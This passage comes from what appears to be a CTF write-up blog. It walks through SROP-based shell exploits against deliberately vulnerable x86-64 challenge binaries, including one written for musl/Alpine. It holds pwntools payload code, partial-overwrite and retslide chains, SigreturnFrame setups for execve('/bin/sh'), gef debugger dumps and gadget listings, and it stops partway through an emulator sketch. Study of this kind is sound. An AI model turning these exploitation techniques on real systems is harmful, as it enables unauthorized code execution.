payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.err
payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.trapno
payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.oldmask
payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.cr2
payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.fpstate # fpu/xmm are not restored if NULL
payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.reserved[8]
payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_sigmask
payload += struct.pack("<Q", 0x0)        # rt_sigframe.info
payload += p64(0xcacacacacacacaca)
print('[!] sliding up...')
p.send(payload)

print('[!] sliding down...')
for i in range(1, 10):
    payload = b'A' * 0x28
    payload += p64(ADD) + p64(0)
    payload += p64(elf.sym['main'])
    time.sleep(0.1)
    p.send(payload)

print('[!] writing second section of srop frame')
payload = b'A' * 0x28
payload += p64(elf.sym['_start'])
payload += struct.pack("<Q", 0x02)       # rt_sigframe.uc.uc_mcontext.rbx
payload += struct.pack("<Q", 0x0)        # rt_sigframe.uc.uc_mcontext.rdx
payload += struct.pack("<Q", 59)         # rt_sigframe.uc.uc_mcontext.rax
payload += struct.pack("<Q", 0x03)       # rt_sigframe.uc.uc_mcontext.rcx
payload += struct.pack("<Q", 0x4031e0)   # rt_sigframe.uc.uc_mcontext.rsp
payload += struct.pack("<Q", SYSCALL)    # rt_sigframe.uc.uc_mcontext.rip
payload += p64(0)
We must, however, answer two more questions: the first one being where to place /bin/sh, and the second one being rax control. We can actually answer both of these questions at once.

Given that the binary uses the read syscall, rax is set to the number of bytes read. We can simply move rbp to an area in .bss and then read exactly 0xf bytes (the funny sigreturn syscall number), part of which is /bin/sh. This does require a bit more stack feng shui - given that our 0xf read must necessarily not overwrite the return address of our read call, we must prepare the necessary return address to syscall beforehand. We must also note that at this juncture, we need to be positioned above our syscall gadget, as well as the SROP frame we have been patiently constructing.
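A minimal sketch of that final read. Putting the string at the very start of the 15 bytes and padding with 'B' are my assumptions here; the only hard requirements are the length and the NUL terminator.

```python
SYS_RT_SIGRETURN = 0xf  # x86-64 syscall number for rt_sigreturn

# read() returns the number of bytes it consumed in rax, so sending exactly
# 15 bytes both stores "/bin/sh\0" and loads rax for the next syscall.
binsh = b"/bin/sh\x00"
final_read = binsh.ljust(SYS_RT_SIGRETURN, b"B")  # padding byte is arbitrary

print(len(final_read), final_read)
```

This has to go out with a raw send (no trailing newline), otherwise read returns 16 and the next syscall is not sigreturn.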

This layout will look somewhat like this. From the top of the stack we have the return into one read call (in the middle of main), one throwaway value that gets popped into rbp (because main ends in pop rbp ; ret), and our syscall gadget, which is directly followed by the SROP frame.
gef> x/16g $rsp
0x7fff1ca4d020:	0x0000000000400454	0x000000000040046d
0x7fff1ca4d030:	0x000000000040046a	0x00007fff1ca4d218
0x7fff1ca4d040:	0x4141414141414141	0x0000000000000000
0x7fff1ca4d050:	0x00007fff1ca4d0c0	0x0000000000000002
0x7fff1ca4d060:	0x00007f07e32a1000	0x0000000000402e40
0x7fff1ca4d070:	0x0000000000000000	0x0000000000400385
0x7fff1ca4d080:	0x00007fff1ca4d088	0x0000000000000068
0x7fff1ca4d090:	0x4141414141414141	0x4141414141414141
gef> x/i 0x00000040046a
   0x40046a <main+26>:	syscall
gef> x/i 0x00000040046d
=> 0x40046d <main+29>:	ret
gef> x/i 0x000000400454
   0x400454 <main+4>:	lea    rcx,[rbp-0x20]
The program flow will then complete the read, pop rbp, and then ret to our syscall gadget.
--------------------------------------------------------------------------------------------------------------- arguments ----
[+] Detected syscall (arch:X86, mode:64)
    rt_sigreturn()
[+] Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0xf
----------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1533937] Name: "main", stopped at 0x00000040046a <main+0x1a>, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x00000040046a <main+0x1a>
[ #1] 0xc308c4834808ec83 <NO_SYMBOL>
[ #2] 0x000000000000 <NO_SYMBOL>
------------------------------------------------------------------------------------------------------------------------------
gef> x/32g $rsp
0x7fff1ca4d038:	0x00007fff1ca4d218	0x4141414141414141
0x7fff1ca4d048:	0x0000000000000000	0x00007fff1ca4d0c0
0x7fff1ca4d058:	0x0000000000000002	0x00007f07e32a1000
0x7fff1ca4d068:	0x0000000000402e40	0x0000000000000000
0x7fff1ca4d078:	0x0000000000400385	0x00007fff1ca4d088
0x7fff1ca4d088:	0x0000000000000068	0x4141414141414141
0x7fff1ca4d098:	0x4141414141414141	0x00000000004031e0
0x7fff1ca4d0a8:	0x0000000000000000	0x0000000000000005
0x7fff1ca4d0b8:	0x0000000000000002	0x0000000000000000
0x7fff1ca4d0c8:	0x000000000000003b	0x0000000000000003
0x7fff1ca4d0d8:	0x00000000004031e0	0x000000000040046a
Interestingly, note that the SROP frame _does_ end up having some garbage values. The SROP frame does not need to be perfect, as some of the fields will go into unused registers.
0x7fff1ca4d038|+0x0000|+000: rt_sigframe.pretcode                      : 0x00007fff1ca4d218  ->  0x00007fff1ca4ded4  ->  0x504d554a4f545541 'AUTOJUMP_ERROR_PATH=/home/wrenches/.local/share/autojump/errors.[...]'
0x7fff1ca4d040|+0x0008|+001: rt_sigframe.uc.uc_flags                   : 0x4141414141414141 'AAAAAAAA'
0x7fff1ca4d048|+0x0010|+002: rt_sigframe.uc.uc_link                    : 0x0000000000000000
0x7fff1ca4d050|+0x0018|+003: rt_sigframe.uc.uc_stack.ss_sp             : 0x00007fff1ca4d0c0  ->  0x0000000000000000
0x7fff1ca4d058|+0x0020|+004: rt_sigframe.uc.uc_stack.ss_flags|ss_size  : 0x0000000000000002
0x7fff1ca4d060|+0x0028|+005: rt_sigframe.uc.uc_mcontext.r8             : 0x00007f07e32a1000 <_rtld_local>  ->  0x00007f07e32a25f0  ->  0x0000000000000000  <-  $r14
0x7fff1ca4d068|+0x0030|+006: rt_sigframe.uc.uc_mcontext.r9             : 0x0000000000402e40 <__do_global_dtors_aux_fini_array_entry>  ->  0x0000000000400410 <__do_global_dtors_aux>  ->  0x2be93d80fa1e0ff3  <-  $r15
0x7fff1ca4d070|+0x0038|+007: rt_sigframe.uc.uc_mcontext.r10            : 0x0000000000000000
0x7fff1ca4d078|+0x0040|+008: rt_sigframe.uc.uc_mcontext.r11            : 0x0000000000400385 <_start+0x25>  ->  0x0000841f0f2e66f4
0x7fff1ca4d080|+0x0048|+009: rt_sigframe.uc.uc_mcontext.r12            : 0x00007fff1ca4d088  ->  0x0000000000000068
0x7fff1ca4d088|+0x0050|+010: rt_sigframe.uc.uc_mcontext.r13            : 0x0000000000000068
0x7fff1ca4d090|+0x0058|+011: rt_sigframe.uc.uc_mcontext.r14            : 0x4141414141414141
0x7fff1ca4d098|+0x0060|+012: rt_sigframe.uc.uc_mcontext.r15            : 0x4141414141414141
0x7fff1ca4d0a0|+0x0068|+013: rt_sigframe.uc.uc_mcontext.rdi            : 0x00000000004031e0  ->  0x0068732f6e69622f ('/bin/sh'?)  <-  $rsi
0x7fff1ca4d0a8|+0x0070|+014: rt_sigframe.uc.uc_mcontext.rsi            : 0x0000000000000000
0x7fff1ca4d0b0|+0x0078|+015: rt_sigframe.uc.uc_mcontext.rbp            : 0x0000000000000005
0x7fff1ca4d0b8|+0x0080|+016: rt_sigframe.uc.uc_mcontext.rbx            : 0x0000000000000002
0x7fff1ca4d0c0|+0x0088|+017: rt_sigframe.uc.uc_mcontext.rdx            : 0x0000000000000000
0x7fff1ca4d0c8|+0x0090|+018: rt_sigframe.uc.uc_mcontext.rax            : 0x000000000000003b
0x7fff1ca4d0d0|+0x0098|+019: rt_sigframe.uc.uc_mcontext.rcx            : 0x0000000000000003
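To see why the junk is harmless, here is a sketch that takes the 22 qwords from the x/32g dump above and pulls out only the slots an execve actually depends on. The offsets are relative to rsp at the sigreturn syscall; the rest is just struct unpacking.

```python
import struct

# Qwords starting at 0x7fff1ca4d038, copied from the x/32g output above.
DUMP = [
    0x00007fff1ca4d218, 0x4141414141414141, 0x0000000000000000, 0x00007fff1ca4d0c0,
    0x0000000000000002, 0x00007f07e32a1000, 0x0000000000402e40, 0x0000000000000000,
    0x0000000000400385, 0x00007fff1ca4d088, 0x0000000000000068, 0x4141414141414141,
    0x4141414141414141, 0x00000000004031e0, 0x0000000000000000, 0x0000000000000005,
    0x0000000000000002, 0x0000000000000000, 0x000000000000003b, 0x0000000000000003,
    0x00000000004031e0, 0x000000000040046a,
]
raw = struct.pack(f"<{len(DUMP)}Q", *DUMP)

# Slots that matter for execve("/bin/sh", NULL, NULL) followed by a syscall.
IMPORTANT = {"rdi": 0x68, "rsi": 0x70, "rdx": 0x88, "rax": 0x90, "rsp": 0xa0, "rip": 0xa8}
regs = {name: struct.unpack_from("<Q", raw, off)[0] for name, off in IMPORTANT.items()}

# r8..r15 occupy 0x28..0x67 and are whatever the stack happened to hold.
junk = struct.unpack_from("<8Q", raw, 0x28)

for name, value in regs.items():
    print(f"{name:3s} = {value:#x}")
print("r8-r15 leftovers:", [hex(v) for v in junk])
```

Everything from r8 through r15 is leftover pointers and padding, and execve does not care about any of it.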
Anyways, after this our SROP ends up succeeding and we get a shell. Yay!
    0x40045d bf00000000            <main+0xd>   mov    edi, 0x0
    0x400462 4889ce                <main+0x12>   mov    rsi, rcx
    0x400465 ba80000000            <main+0x15>   mov    edx, 0x80
 -> 0x40046a 0f05                  <main+0x1a>   syscall
    0x40046c 5d                    <main+0x1c>   pop    rbp
    0x40046d c3                    <main+0x1d>   ret
    0x40046e 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
    0x400470 f30f1efa              <_fini>   endbr64
    0x400474 4883ec08              <_fini+0x4>   sub    rsp, 0x8
--------------------------------------------------------------------------------------------------------------- arguments ----
[+] Detected syscall (arch:X86, mode:64)
    execve(const char __user *filename, const char __user *const __user *argv, const char __user *const __user *envp)
[+] Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0x3b
    filename             $rdi                 0x00000000004031e0  ->  0x0068732f6e69622f ('/bin/sh'?)
    argv                 $rsi                 0x0000000000000000
    envp                 $rdx                 0x0000000000000000
----------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1533937] Name: "main", stopped at 0x00000040046a <main+0x1a>, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x00000040046a <main+0x1a>
------------------------------------------------------------------------------------------------------------------------------
gef> 

closing thoughts

Good challenge! There are a lot of interesting things you can do with building SROP frames piece by piece, due to the fact that (as mentioned above) SROP frames do not need to be completely free of junk. Even if your writes are weak and litter the space with garbage pointers, with enough care and precision you can, indeed, carefully position that junk to whack irrelevant register values instead.

I would love to talk more about these sorts of techniques (I call this sort of shit 'patchwork SROP' but there is no way it is novel), but unfortunately, the challenges I've been able to use them in are embargoed, either by my own doing (I'd like to be able to use them in some event that hasn't happened yet) or someone else's (like, not being able to publish Dreamhack solutions).

A lot of interesting stuff can be seen here. Shoutout to the Netherlands for inventing SROP. It really can do everything.

lnc26 - overly simplified pwn challenge v2 (by me)

tldr musl pwn. partial overwrite to syscall gad
#include <stdio.h>
#include <unistd.h>

int main(void) {
    char buf[0x50];
    read(0, buf, 0x1000);
    return 0;
}
The version of this challenge used for the competition proper had a few extra gadgets given in the form of a gift function. Personally, I have improved in stack pwn over the past two months since this challenge was written, and I wondered whether or not it was possible without the added gadgets (a pop rbx and a mov rax, rdx). Turns out, yes! Quite easily, actually: it took me around an hour.

Anyways very standard. 0x1000 (wow, generous) byte write into an 0x50 buffer. The key contrivance of this challenge is that it's hosted on alpine and therefore compiled for musl. It turns out that this change does not really do much of anything, other than add some ragebait later down the line and also provide a helpful pop rax gadget.
wrenches@kitty (mplified-pwn-challenge-v2) > ROPgadget --binary=main --nojop | grep pop
0x000000000040111c : add byte ptr [rcx], al ; pop rbp ; ret
0x0000000000401117 : mov byte ptr [rip + 0x2f02], 1 ; pop rbp ; ret
0x0000000000401001 : pop rax ; ret
0x000000000040111e : pop rbp ; ret
Anyways, the solution for this challenge is also SROP. We don't have any syscall gadgets in the binary, but using the same trick from earlier (leaving libc pointers on the stack through I/O function calls), we see that, besides the GOT entries, two specific libc pointers are given to us, each showing up twice.
[+] Searching for addresses in 'main' that point to 'ld'
main_patched: 0x0000000000403fd0 <read@got[plt]>  ->  0x00007f9545bdf480 <read>  ->  0x48f0894810ec8348
main_patched: 0x0000000000403fd8 <__libc_start_main@got.plt>  ->  0x00007f9545bb649d <__libc_start_main>  ->  0xfc8949c663485441
main_patched: 0x00000000004041b8  ->  0x00007f9545bdacb5  ->  0x5375fcf88348595a
main_patched: 0x00000000004041e8  ->  0x00007f9545bdf49f <read+0x1f>  ->  0xe9c7894818c48348
main_patched: 0x00000000004042b8  ->  0x00007f9545bdacb5  ->  0x5375fcf88348595a
main_patched: 0x00000000004042e8  ->  0x00007f9545bdf49f <read+0x1f>  ->  0xe9c7894818c48348
Note that the function called is read(), which does not null terminate the buffer we read into. read() is extremely nice and gives us very fine-grained control over what bytes we specifically want to write, so we can partially overwrite the least significant bytes of these saved return addresses to point to a more useful gadget.

It is easy to find a target gadget to overwrite to - we just look around at what's within snapping distance from our saved pointers. It turns out that read and readlink are directly adjacent to one another in this libc's .text section. readlink has a syscall gadget.
gef> x/16i 0x00007f9545bdf49f
   0x7f9545bdf49f <read+31>:	add    rsp,0x18
   0x7f9545bdf4a3 <read+35>:	mov    rdi,rax
   0x7f9545bdf4a6 <read+38>:	jmp    0x7f9545bb72da <fetestexcept+668>
   0x7f9545bdf4ab <readlink>:	sub    rsp,0x18
   0x7f9545bdf4af <readlink+4>:	lea    r8,[rsp+0xf]
   0x7f9545bdf4b4 <readlink+9>:	test   rdx,rdx
   0x7f9545bdf4b7 <readlink+12>:	jne    0x7f9545bdf4c6 <readlink+27>
   0x7f9545bdf4b9 <readlink+14>:	lea    r8,[rsp+0xf]
   0x7f9545bdf4be <readlink+19>:	mov    edx,0x1
   0x7f9545bdf4c3 <readlink+24>:	mov    rsi,r8
   0x7f9545bdf4c6 <readlink+27>:	mov    eax,0x59
   0x7f9545bdf4cb <readlink+32>:	syscall
   0x7f9545bdf4cd <readlink+34>:	xor    edx,edx
   0x7f9545bdf4cf <readlink+36>:	test   eax,eax
   0x7f9545bdf4d1 <readlink+38>:	cmovle edx,eax
   0x7f9545bdf4d4 <readlink+41>:	cmp    rsi,r8
gef> 
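To make the "snapping distance" concrete, here is a minimal Python sketch that works out how many low-order bytes have to change to turn the saved read+0x1f pointer into the syscall at readlink+32. The two addresses are copied from the dump above; partial_overwrite is a made-up helper name and not part of the exploit script.

```python
import struct

def partial_overwrite(saved: int, target: int) -> bytes:
    """Return the fewest low-order bytes that turn `saved` into `target`.

    Pointers are little-endian, so the low bytes come first in memory and
    are the first ones a short read() will clobber.
    """
    diff = saved ^ target
    # Number of bytes that differ, counted from the least significant end.
    n = max(1, (diff.bit_length() + 7) // 8)
    return struct.pack('<Q', target)[:n]

saved_ret = 0x00007f9545bdf49f  # read+0x1f, left behind in memory
syscall = 0x00007f9545bdf4cb    # readlink+32, the syscall instruction

patch = partial_overwrite(saved_ret, syscall)
print(len(patch), patch.hex())  # 1 cb
```

Both addresses share everything above the lowest byte, so a single byte is enough. ASLR only randomizes at page granularity, which leaves the low 12 bits fixed, so a one-byte patch like this needs no brute force.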
Perfect. We just need to position an SROP frame beneath that specific gadget (in this case we target the address placed at 0x4049e8).
f = SigreturnFrame(kernel='amd64')
f.rsp = 0x4049e8 # slot that will hold the partially-overwritten syscall pointer
f.rip = 0x401181 # a plain ret, so execution falls back onto that slot
f.rax = 0x3b # execve
f.rdi = (0x404800 - 0x50) # "/bin/sh"
f.rsi = (0x404800 - 0x10) # argv
f.rdx = 0x0
f.r13 = 0x404300 # this is the write's saved rbp, 0x58
f.r14 = READ # this is the write's saved retaddr, 0x60

print('[!] writing SROP frame')
p.send(bytes(f)); l()
Funnily enough, our SROP frame ends up overlapping the write's saved RBP and return address, specifically at the frame's r13 and r14 slots. We don't care what ends up in r13 or r14, so those slots simply hold the values the write needs. Additionally, because the sigreturn only prepares the registers and we still need a second syscall to actually execve, the RIP stored in the SROP frame needs to be a ret instruction, and its rsp needs to point back at the slot holding the partially-overwritten syscall gadget. This is the only way we can get another syscall.
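For readers who want to see why r13 and r14 are the slots that collide, here is a rough standard-library sketch of the amd64 sigreturn frame layout (the ucontext header followed by sigcontext, eight bytes per field). The field names and the build_frame helper are my own labels for illustration, not pwntools' API, and the offsets are counted from the first byte of the frame, which is not necessarily the base the comments in the listing use. It assumes the frame is written at the start of a 0x50-byte buffer, so the saved rbp sits at +0x50 and the return address at +0x58.

```python
import struct

# One 8-byte slot per field, in memory order (names are illustrative).
FIELDS = [
    'uc_flags', 'uc_link', 'ss_sp', 'ss_flags', 'ss_size',
    'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15',
    'rdi', 'rsi', 'rbp', 'rbx', 'rdx', 'rax', 'rcx', 'rsp', 'rip',
    'eflags', 'csgsfs', 'err', 'trapno', 'oldmask', 'cr2',
    'fpstate', 'reserved', 'sigmask',
]
OFFSET = {name: 8 * i for i, name in enumerate(FIELDS)}

def build_frame(**regs: int) -> bytes:
    """Pack a frame with the given fields set and everything else zero."""
    frame = bytearray(8 * len(FIELDS))
    # 0x33 is the usual 64-bit user-mode code segment selector.
    struct.pack_into('<Q', frame, OFFSET['csgsfs'], 0x33)
    for name, value in regs.items():
        struct.pack_into('<Q', frame, OFFSET[name], value)
    return bytes(frame)

frame = build_frame(
    rax=0x3b,                # execve
    rdi=0x404800 - 0x50,     # "/bin/sh"
    rsi=0x404800 - 0x10,     # argv
    rdx=0,
    rsp=0x4049e8,            # slot holding the overwritten syscall pointer
    rip=0x401181,            # ret
)

# Which frame fields sit on top of saved rbp (+0x50) and retaddr (+0x58)?
overlap = [n for n in FIELDS if OFFSET[n] in (0x50, 0x58)]
print(hex(len(frame)), overlap)  # 0xf8 ['r13', 'r14']
```

The same table is handy for the "patchwork" idea: any slot whose register you don't care about is a place where junk can safely live.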

After we prepare the SROP frame beneath our soon-to-be-overwritten syscall gadget, we pivot back upwards on top of the syscall gadget and write four things:
  1. Our /bin/sh pointer
  2. A retslide downwards to the syscall gadget
  3. A pop rax chain to set rax = 0xf
  4. Our overwritten byte
payload = flat({
    0x0: b'/bin/sh\x00', # filename for execve
    0x20: b'sh\x00', # argv[0]
    0x40: 0x4047d0, # argv: pointer to "sh"
    0x48: 0 # argv terminator
}, filler=b'\x00')

payload += b'A' * (0x50 - len(payload))
payload += p64(RET) * ((0x4049d8 - 0x404800) // 8) # retslide down to the pop rax
payload += p64(POP_RAX) + p64(0x0f) # rax = rt_sigreturn
payload += b'\xa0' # partial overwrite
input('[!] writing retslide, pop rax + partial overwrite')
p.send(payload); l()
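As a sanity check on the arithmetic in that payload, the sketch below rebuilds its shape with only the standard library and confirms where each piece lands. RET and POP_RAX are read off the stack dump that follows (0x401181 and 0x401183), and the buffer base is assumed to be 0x404800 - 0x50, matching rdi in the SROP frame; build is a hypothetical helper.

```python
import struct

BUF = 0x404800 - 0x50                 # assumed base of the pivoted buffer
RET, POP_RAX = 0x401181, 0x401183     # taken from the gef stack dump
SLIDE_START, SLIDE_END = 0x404800, 0x4049d8

def build() -> bytes:
    payload = bytearray(0x50)          # the 0x50-byte buffer itself
    payload[0:8] = b'/bin/sh\x00'
    slide_len = (SLIDE_END - SLIDE_START) // 8
    payload += struct.pack('<Q', RET) * slide_len   # retslide
    payload += struct.pack('<QQ', POP_RAX, 0xf)     # rax = 15 (rt_sigreturn)
    payload += b'\xa0'                               # low byte of libc pointer
    return bytes(payload)

payload = build()
slide_len = (SLIDE_END - SLIDE_START) // 8
last_byte_addr = BUF + len(payload) - 1

print(slide_len, hex(last_byte_addr))  # 59 0x4049e8
```

The final byte lands exactly on the low byte of the stale libc pointer at 0x4049e8, which is also the address the SROP frame uses for rsp.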
Debugging, we can see the ret-slide, the pop rax and the overwritten libc pointer:
---------------------------------------------------------------------------------------------------------------------------- stack ----
$rsp  0x0000004049b0|+0x0000|+000: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049b8|+0x0008|+001: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049c0|+0x0010|+002: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049c8|+0x0018|+003: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049d0|+0x0020|+004: 0x0000000000401181 <main+0x24>  ->  0x00000000c35850c3  <-  retaddr[0], $rbp, $rip
      0x0000004049d8|+0x0028|+005: 0x0000000000401183  ->  0x000000000000c358
      0x0000004049e0|+0x0030|+006: 0x000000000000000f
      0x0000004049e8|+0x0038|+007: 0x00007ffa8b0ea4a0 <readlinkat+0x19>  ->  0x4e0fc085c931050f
-------------------------------------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x401176 e8a5feffff            <main+0x19>   call   0x401020 <read@plt>
    0x40117b b800000000            <main+0x1e>   mov    eax, 0x0
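(Forgive the different colors; I'm now debugging inside the Alpine container. The libc in there apparently lays things out a little differently from the earlier dump, so the syscall we snap to shows up as readlinkat+0x19, hence the 0xa0 byte.)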

Alpine containers actually need a slightly different execve setup in terms of registers, because /bin/sh is a symlink to busybox, and busybox picks which applet to run from argv[0], so it needs a real argv. But anyways, executing this successfully, we pop our shell.
[+] Detected syscall (arch:X86, mode:64)
    execve(const char __user *filename, const char __user *const __user *argv, const char __user *const __user *envp)
    Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0x3b
    filename             $rdi                 0x00000000004047b0  ->  0x0068732f6e69622f ('/bin/sh'?)
    argv                 $rsi                 0x00000000004047f0  ->  0x00000000004047d0  ->  0x0000000000006873 ('sh'?)
    envp                 $rdx                 0x0000000000000000
-------------------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:263] Name: "main", stopped at 0x7ffa8b0ea4a0 <readlinkat+0x19>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7ffa8b0ea4a0 <readlinkat+0x19> (frame name: __syscall4)
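The argv setup in that syscall dump can be reconstructed offline. This is a small sketch, assuming the 0x50-byte block is based at 0x4047b0 (0x404800 - 0x50) as in the SROP frame; build_block, cstr and read_argv are hypothetical helpers that mimic how the kernel walks the pointers.

```python
import struct

BASE = 0x404800 - 0x50   # 0x4047b0, assumed address of the block

def build_block() -> bytes:
    blk = bytearray(0x50)
    blk[0x00:0x08] = b'/bin/sh\x00'                    # filename
    blk[0x20:0x23] = b'sh\x00'                          # argv[0] string
    blk[0x40:0x48] = struct.pack('<Q', BASE + 0x20)     # argv[0] pointer
    blk[0x48:0x50] = struct.pack('<Q', 0)               # argv terminator
    return bytes(blk)

def cstr(blk: bytes, addr: int) -> bytes:
    """Read a NUL-terminated string at an absolute address."""
    off = addr - BASE
    return blk[off:blk.index(b'\x00', off)]

def read_argv(blk: bytes, addr: int) -> list:
    """Follow a NULL-terminated array of string pointers."""
    out = []
    while True:
        (ptr,) = struct.unpack_from('<Q', blk, addr - BASE)
        if ptr == 0:
            return out
        out.append(cstr(blk, ptr))
        addr += 8

blk = build_block()
rdi, rsi = BASE, BASE + 0x40
print(cstr(blk, rdi), read_argv(blk, rsi))  # b'/bin/sh' [b'sh']
```

With rdx left at zero there is no envp, which is fine for popping a shell.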

closing thoughts

This challenge sucks because I wrote it.

My original solution to this challenge, where you are gifted rbx control from magic and dreams, is extremely contrived and frankly a lot more interesting (less educational value, so I chose to focus on a more standard partial overwrite -> SROP chain). The one-gadget tool does not work in musl libc, so I just incremented an existing libc address in .bss to system() (using our add gadget, of course).

However, with no nice SROP to set registers, the question of proper rdi setting arises. We have no pop rdi gadget (challs w/ pop rdi are for the weak). Here, real bullshit is required. We forsake Buddhism here, carve pentagrams into our walls with oxblood and forge a deal with Baphomet to open our ROPfu 6-eye in order to see this solution.

After waiting for Baphomet to accept our offering, he will provide the solution on an obsidian stele emerging from the centrepoint of our oxblood pentagram. It involves this mov edi gadget:
wrenches@kitty (mplified-pwn-challenge-v2) > ROPgadget --binary=main | grep edi
0x0000000000401097 : je 0x4010a0 ; mov edi, 0x404008 ; jmp rax
0x00000000004010d9 : je 0x4010e8 ; mov edi, 0x404008 ; jmp rax
0x000000000040106e : mov edi, 0x40115d ; jmp 0x401030
0x0000000000401099 : mov edi, 0x404008 ; jmp rax
0x0000000000401095 : test eax, eax ; je 0x4010a0 ; mov edi, 0x404008 ; jmp rax
0x00000000004010d7 : test eax, eax ; je 0x4010e8 ; mov edi, 0x404008 ; jmp rax
Our only rdi control is mov edi, 0x404008. 0x404008 is a writable region of memory. We just pivot over there and place /bin/sh inside of it. Additionally, because our control flow with this gadget is a jmp rax, we set rax beforehand to return to a ret instruction such that our ROP chain continues. Then we just call system and win.

That is, until system eventually segfaults. Baphomet has unfortunately failed to inform us that system calls posix_spawn, and posix_spawn requires 0x1628 bytes of stack space. Remember that our stack now lives in .bss, which is a single page long, so that allocation runs straight off the bottom of the page. Indeed, selling our soul to the Devil came with a price: it is, unfortunately, impossible to call system() at all.
gef> x/16i posix_spawn
   0x7fb03338359b <posix_spawn>:	push   r15
   0x7fb03338359d <posix_spawn+2>:	mov    r15,rsi
   0x7fb0333835a0 <posix_spawn+5>:	push   r14
   0x7fb0333835a2 <posix_spawn+7>:	mov    r14,rdx
   0x7fb0333835a5 <posix_spawn+10>:	push   r13
   0x7fb0333835a7 <posix_spawn+12>:	mov    r13,rdi
   0x7fb0333835aa <posix_spawn+15>:	mov    edi,0x1
   0x7fb0333835af <posix_spawn+20>:	push   r12
   0x7fb0333835b1 <posix_spawn+22>:	mov    r12,r8
   0x7fb0333835b4 <posix_spawn+25>:	push   rbp
   0x7fb0333835b5 <posix_spawn+26>:	mov    rbp,r9
   0x7fb0333835b8 <posix_spawn+29>:	push   rbx
   0x7fb0333835b9 <posix_spawn+30>:	mov    rbx,rcx
   0x7fb0333835bc <posix_spawn+33>:	sub    rsp,0x1628
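The numbers in that prologue are enough to show the problem on paper. A quick sketch, under the assumption that our usable stack is exactly one 0x1000-byte page starting at 0x404000 (the address is inferred from 0x404008 being writable; the helper names are made up):

```python
PAGE = 0x1000
BSS_START = 0x404000          # assumed start of the writable page
BSS_END = BSS_START + PAGE

PUSHES = 6                    # r15, r14, r13, r12, rbp, rbx
FRAME = 0x1628                # sub rsp, 0x1628

def lowest_touched(rsp: int) -> int:
    """Stack pointer after posix_spawn's prologue has run."""
    return rsp - 8 * PUSHES - FRAME

def fits(rsp: int) -> bool:
    return lowest_touched(rsp) >= BSS_START

# Even starting from the very top of the page there is not enough room.
print(hex(lowest_touched(BSS_END)), fits(BSS_END))  # 0x4039a8 False
```

The prologue alone wants 0x1658 bytes, more than the whole page, so no choice of pivot address inside .bss can make the call survive.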
At this juncture we go back to Christ, who tells us to just use a ret2syscall. He, however, reveals to us that we do not actually need SROP to set any registers. How? Using our edi value planted at 0x404008 and pop rax, we are almost ready to just directly perform an execve syscall anyway. We just need to set rsi. Helpfully, we still have the add primitive and just need to find something to add to.
0x0000000000055f72 : mov esi, dword ptr [rsi + 0x10] ; syscall
0x000000000006a4c4 : mov esi, eax ; mov eax, 0x59 ; syscall
0x0000000000069c94 : mov esi, eax ; syscall
0x0000000000069da7 : mov esi, ebp ; mov rdx, r13 ; syscall
0x000000000005f4bd : mov esi, ebp ; mov rdx, rbx ; syscall
0x0000000000055680 : mov esi, ebp ; sub rsp, 0x10 ; syscall
0x0000000000056771 : mov esi, ebp ; syscall
0x0000000000069fbf : mov esi, ebx ; mov rdx, rbp ; syscall
0x0000000000069f8b : mov esi, ebx ; sub rsp, 0x20 ; syscall
0x000000000005e649 : mov esi, ebx ; sub rsp, 0x28 ; syscall
0x0000000000056933 : mov esi, ebx ; syscall
0x000000000005ed48 : mov esi, ecx ; mov rdx, r8 ; syscall
0x000000000005e88f : mov esi, ecx ; syscall
0x000000000005dfd1 : mov esi, edx ; syscall
0x0000000000043433 : mov esi, esi ; mov eax, 0x12c ; syscall
God rewards us for returning to him, like the Prodigal Son, by giving us a mov esi, ebp ; syscall gadget in musl. We have direct control of rbp, so, this solves the whole challenge. Or alternatively you can leak libc or whatever. Works also.
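To check that these pieces really compose, here is a toy emulator for the four gadgets involved. It is only a sketch of one possible ordering, not my actual chain: the binary gadget addresses come from the ROPgadget output and the gef dump, LIBC_BASE is a placeholder because the real base is never known here, and ARGV is a hypothetical .bss address holding an argv array. rdx is not modeled at all.

```python
POP_RAX = 0x401001            # pop rax ; ret
POP_RBP = 0x40111e            # pop rbp ; ret
RET = 0x401181                # ret
MOV_EDI_JMP_RAX = 0x401099    # mov edi, 0x404008 ; jmp rax
LIBC_BASE = 0x7f0000000000    # placeholder, not a real leak
MOV_ESI_EBP_SYSCALL = LIBC_BASE + 0x56771  # mov esi, ebp ; syscall
ARGV = 0x404100               # hypothetical argv array in .bss

def run(chain):
    """Walk the chain like the CPU would and return registers at syscall."""
    regs = {'rax': 0, 'rdi': 0, 'rsi': 0, 'rbp': 0}
    stack = list(chain)
    pc = stack.pop(0)
    while True:
        if pc == POP_RAX:
            regs['rax'] = stack.pop(0)
            pc = stack.pop(0)
        elif pc == POP_RBP:
            regs['rbp'] = stack.pop(0)
            pc = stack.pop(0)
        elif pc == RET:
            pc = stack.pop(0)
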